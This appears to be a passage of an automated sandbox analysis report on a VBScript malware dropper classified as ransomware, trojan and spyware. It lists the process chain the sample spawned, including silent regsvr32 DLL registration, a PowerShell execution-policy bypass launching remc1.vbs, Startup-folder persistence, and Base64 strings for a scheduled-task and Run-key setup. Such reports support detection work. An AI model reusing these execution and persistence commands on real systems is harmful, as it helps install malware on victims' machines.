        Source: 2.2.wscript.exe.5e40000.1.raw.unpack, Settings.csBase64 encoded string: 'VEt2PmhXMMIt1dJJJECAz1WHnDL0wlv8IZt1vpqPNSFxB38K5Btmk1hTwcjn9han0ayQP0bB+Dh7QB7osZeYkA==', 'xd+Dai6+yRW6ujvs7vLc/cH9S9P/cTNYodhYagiqgL97VyapNynPnF0PTLKK2XHfmzvtJP1hDiiCDjCCbbR2gQ==', 'sMndhh2MvpuufroCmflUDuSwMQ+cOpIT+VS5R/tqUQcheLpWC3ZItPRcfQ5pnglAkiJsD3tpCmljZBvTe2tQmw==', 'pB01OnXWD+ngTP35Ii2u/7nr6IpExfhu+WCLM6omlGKD49lHckRODiv/tW01SnNvTobEOHUlz+Lm0QwPEFT6sg==', 'Kst/cpNW+stInyo+R7DQSM2o2em2NU3tslltNPKEbP0VufIxNIpr8zRAFAch4T0zWNHbhiNUVWo4k1z3WEVwaA==', 'mtRC3wTN5SvMmbJs9uQ1SY+OPyMC6gMCVuHBNAUrmIH+ww3t7CVwPp/OXhdZ5YiNclgAKmE7+7Lhumcv5vNALBO9qCqSauTILC9saRZ6ACXZyGf1Lmj48gVVjJvkOLQRzsxGGJbjZF6Asb83YaHLELMIT8pRILLAxbzoESgfMYDwAAdYw/Nq0qVAVAKJo2gF81yzR+Vb5ymN2hldxU61V8i2lKAhID/S/NhP6F30oKnyF60/3zQU4HnJ5p/ixOi/jtkbI8fXBYRpYkSRAJyBMwTnbM61ihr4dIxGApsBaD0FGMmrkgLw0nNMmxRoQNFOEsDWUZYM7fR4P645Wfmw85VPWOSgmIcuYyIYntXq4Ga7sbfBYu1SR0CDxYp/+bLafN/HMPsOdfaM3jwVSfv26u5j5rmdDs51u5R4L4Bs7Y2iW1p8/OUqJ/9/jDzzzJsv4xuj5WgoUA31ujTFJOQUE4+HP2yqxt9LfNkUO9dCD06oBSbXhM3veF8110H2edIxbrpBbrHbMeq62UWyaws9YXdwxoVcly2DA/LBRQYrIbqPiFBC12hCcF1AByQIlILMkz/u6W1f9tWWqcTa7r1oyX7YltZWqsDxUchQPseFvEawNpGtK7BcSuVW9MSUd2AzDau3mwL9GsrmbsOy/FolLieNVkjeBLLqRPJmWcIjlm+UNYE7/WVNzC3uxtyovWbng9VR/KvQaxnT7qbnXoiXZfBdCV+63p47Arv1upSkaeThXoXpNn0IDwryU1PmAA6v7BaLuLFxTISAXLUL1qRu9CMrpOD31VJcV+gbl+ipGdpKTqj58RyIMBiWubY8TUB4X07OmRbPXosP/QxrCKY/NtvTCjymKOel1Ldny4jKIcWyMB79SBIsPijR9NtercglA0VoTvGplAm454VOLz9Or+zYi3U92tPOowe49/NXlDYBGDXEuqiAYlvW++FymOq3LYrvxEaMIs8S6vQlw4NxSAiDLyQOpWVklkmvJzSXRQHOcah5aUx2sQ8lrvU3lGz9qmrfUfFKLDSWDvejZGDo2qjAl3KXlJkJzairiUzGkcU=', 'qvNv/3DmbVHdwqVdt0nmMBUqDltRMhUdpJZQY4E27P91AuhYn8MBn7MG0uaBbEksI2BCcwA9SOVdNVMyyZW+C6umVJzrelhDRRlJvIYXDzUnzDSejRJ+/otwdE5kmTxz9quBnXtDtKnR7XsRi+waktchFP9+P+O4BwlZ6ZZNxNTRjBIZrrTDEvMlOaCF8M92/VoTExAm8SfrchmqAmBb9UJxqz7Da58InXRt44cQe6j+AjzgkzKNfaiLo2CCmBZY0UWj+2RYheIM4lCnLtNCReavV/Vmb73Un6j/FN22EVg=', 'I1W+CS5O2xwz/mIgFmMBykN7Ee7ho5k8eZ5J6D3YW57aE97qFTUg61n37Li1o0Waqgg19N9QcGdAkEgW6qdgPw==', 'pkvWx9EB/VxDNg1SOI1aRC8cUUDiyfBqf387cZf1bY3ag1BHeM7d+UkRwd4aUVNnt8L65pephvmHsecapeuOSQ==', 'w10TUuQ/QqDCUD6gjZNbacB4b7EcTgPK5AdSg9KwZ7HU3xbacvwRw2NaAtvWQW2okZPgVBwhKrZHG02cp/i9cA==', 'qUiaaVr6ViVdUFy1GCSy/XIoHuDvFENF11hZNTsIxy0QAKLzULCEUoS3YIXYEprVKBqz5RLqqorfOcVVmT8kcw=='
        Source: 2.2.wscript.exe.5e40000.1.raw.unpack, NormalStartup.csBase64 encoded string: 'L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g', 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
        Source: 2.2.wscript.exe.6240000.3.raw.unpack, Settings.csBase64 encoded string: 'VEt2PmhXMMIt1dJJJECAz1WHnDL0wlv8IZt1vpqPNSFxB38K5Btmk1hTwcjn9han0ayQP0bB+Dh7QB7osZeYkA==', 'xd+Dai6+yRW6ujvs7vLc/cH9S9P/cTNYodhYagiqgL97VyapNynPnF0PTLKK2XHfmzvtJP1hDiiCDjCCbbR2gQ==', 'sMndhh2MvpuufroCmflUDuSwMQ+cOpIT+VS5R/tqUQcheLpWC3ZItPRcfQ5pnglAkiJsD3tpCmljZBvTe2tQmw==', 'pB01OnXWD+ngTP35Ii2u/7nr6IpExfhu+WCLM6omlGKD49lHckRODiv/tW01SnNvTobEOHUlz+Lm0QwPEFT6sg==', 'Kst/cpNW+stInyo+R7DQSM2o2em2NU3tslltNPKEbP0VufIxNIpr8zRAFAch4T0zWNHbhiNUVWo4k1z3WEVwaA==', 'mtRC3wTN5SvMmbJs9uQ1SY+OPyMC6gMCVuHBNAUrmIH+ww3t7CVwPp/OXhdZ5YiNclgAKmE7+7Lhumcv5vNALBO9qCqSauTILC9saRZ6ACXZyGf1Lmj48gVVjJvkOLQRzsxGGJbjZF6Asb83YaHLELMIT8pRILLAxbzoESgfMYDwAAdYw/Nq0qVAVAKJo2gF81yzR+Vb5ymN2hldxU61V8i2lKAhID/S/NhP6F30oKnyF60/3zQU4HnJ5p/ixOi/jtkbI8fXBYRpYkSRAJyBMwTnbM61ihr4dIxGApsBaD0FGMmrkgLw0nNMmxRoQNFOEsDWUZYM7fR4P645Wfmw85VPWOSgmIcuYyIYntXq4Ga7sbfBYu1SR0CDxYp/+bLafN/HMPsOdfaM3jwVSfv26u5j5rmdDs51u5R4L4Bs7Y2iW1p8/OUqJ/9/jDzzzJsv4xuj5WgoUA31ujTFJOQUE4+HP2yqxt9LfNkUO9dCD06oBSbXhM3veF8110H2edIxbrpBbrHbMeq62UWyaws9YXdwxoVcly2DA/LBRQYrIbqPiFBC12hCcF1AByQIlILMkz/u6W1f9tWWqcTa7r1oyX7YltZWqsDxUchQPseFvEawNpGtK7BcSuVW9MSUd2AzDau3mwL9GsrmbsOy/FolLieNVkjeBLLqRPJmWcIjlm+UNYE7/WVNzC3uxtyovWbng9VR/KvQaxnT7qbnXoiXZfBdCV+63p47Arv1upSkaeThXoXpNn0IDwryU1PmAA6v7BaLuLFxTISAXLUL1qRu9CMrpOD31VJcV+gbl+ipGdpKTqj58RyIMBiWubY8TUB4X07OmRbPXosP/QxrCKY/NtvTCjymKOel1Ldny4jKIcWyMB79SBIsPijR9NtercglA0VoTvGplAm454VOLz9Or+zYi3U92tPOowe49/NXlDYBGDXEuqiAYlvW++FymOq3LYrvxEaMIs8S6vQlw4NxSAiDLyQOpWVklkmvJzSXRQHOcah5aUx2sQ8lrvU3lGz9qmrfUfFKLDSWDvejZGDo2qjAl3KXlJkJzairiUzGkcU=', 'qvNv/3DmbVHdwqVdt0nmMBUqDltRMhUdpJZQY4E27P91AuhYn8MBn7MG0uaBbEksI2BCcwA9SOVdNVMyyZW+C6umVJzrelhDRRlJvIYXDzUnzDSejRJ+/otwdE5kmTxz9quBnXtDtKnR7XsRi+waktchFP9+P+O4BwlZ6ZZNxNTRjBIZrrTDEvMlOaCF8M92/VoTExAm8SfrchmqAmBb9UJxqz7Da58InXRt44cQe6j+AjzgkzKNfaiLo2CCmBZY0UWj+2RYheIM4lCnLtNCReavV/Vmb73Un6j/FN22EVg=', 'I1W+CS5O2xwz/mIgFmMBykN7Ee7ho5k8eZ5J6D3YW57aE97qFTUg61n37Li1o0Waqgg19N9QcGdAkEgW6qdgPw==', 'pkvWx9EB/VxDNg1SOI1aRC8cUUDiyfBqf387cZf1bY3ag1BHeM7d+UkRwd4aUVNnt8L65pephvmHsecapeuOSQ==', 'w10TUuQ/QqDCUD6gjZNbacB4b7EcTgPK5AdSg9KwZ7HU3xbacvwRw2NaAtvWQW2okZPgVBwhKrZHG02cp/i9cA==', 'qUiaaVr6ViVdUFy1GCSy/XIoHuDvFENF11hZNTsIxy0QAKLzULCEUoS3YIXYEprVKBqz5RLqqorfOcVVmT8kcw=='
        Source: 2.2.wscript.exe.6240000.3.raw.unpack, NormalStartup.csBase64 encoded string: 'L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g', 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
        Source: 2.2.wscript.exe.5e40000.1.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 2.2.wscript.exe.5e40000.1.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: 2.2.wscript.exe.6240000.3.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 2.2.wscript.exe.6240000.3.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: 4.2.RegAsm.exe.5f20000.0.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 4.2.RegAsm.exe.5f20000.0.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: 2.2.wscript.exe.5670000.0.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 2.2.wscript.exe.5670000.0.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winVBS@61/10@1/2
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,17_2_00417952
        Source: C:\Windows\winhlp32.exeCode function: 19_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,19_2_00417952
        Source: C:\Windows\winhlp32.exeCode function: 21_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,21_2_00417952
        Source: C:\Windows\winhlp32.exeCode function: 23_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,23_2_00417952
        Source: C:\Windows\winhlp32.exeCode function: 27_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,27_2_00417952
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,17_2_0040F474
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,17_2_0041B4A8
        Source: C:\Windows\winhlp32.exeCode function: 17_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,17_2_0041AA4A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.logJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4432:120:WilError_03
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\asasasa4242asas
        Source: C:\Windows\winhlp32.exeMutant created: \Sessions\1\BaseNamedObjects\asasasas-SEG6JT
        Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\dynwrapx.dllJump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs"
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: lmg1_Mlakaifa443456.vbsReversingLabs: Detection: 26%
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' & exit
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"'
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\remc1.vbs"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' & exitJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"'
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\remc1.vbs"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dllJump to behavior
